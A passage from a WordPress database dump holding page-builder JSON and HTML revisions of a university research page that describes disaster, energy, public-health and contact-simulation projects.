Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:43:34','2023-09-29 14:43:34','',438,'https://gsudice.dataconn.net/?p=1509',0,'revision','',0),(1510,1,'2023-09-29 10:43:34','2023-09-29 14:43:34','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:43:34','2023-09-29 14:43:34','',126,'https://gsudice.dataconn.net/?p=1510',0,'revision','',0),(1516,1,'2023-09-29 10:44:09','2023-09-29 14:44:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific 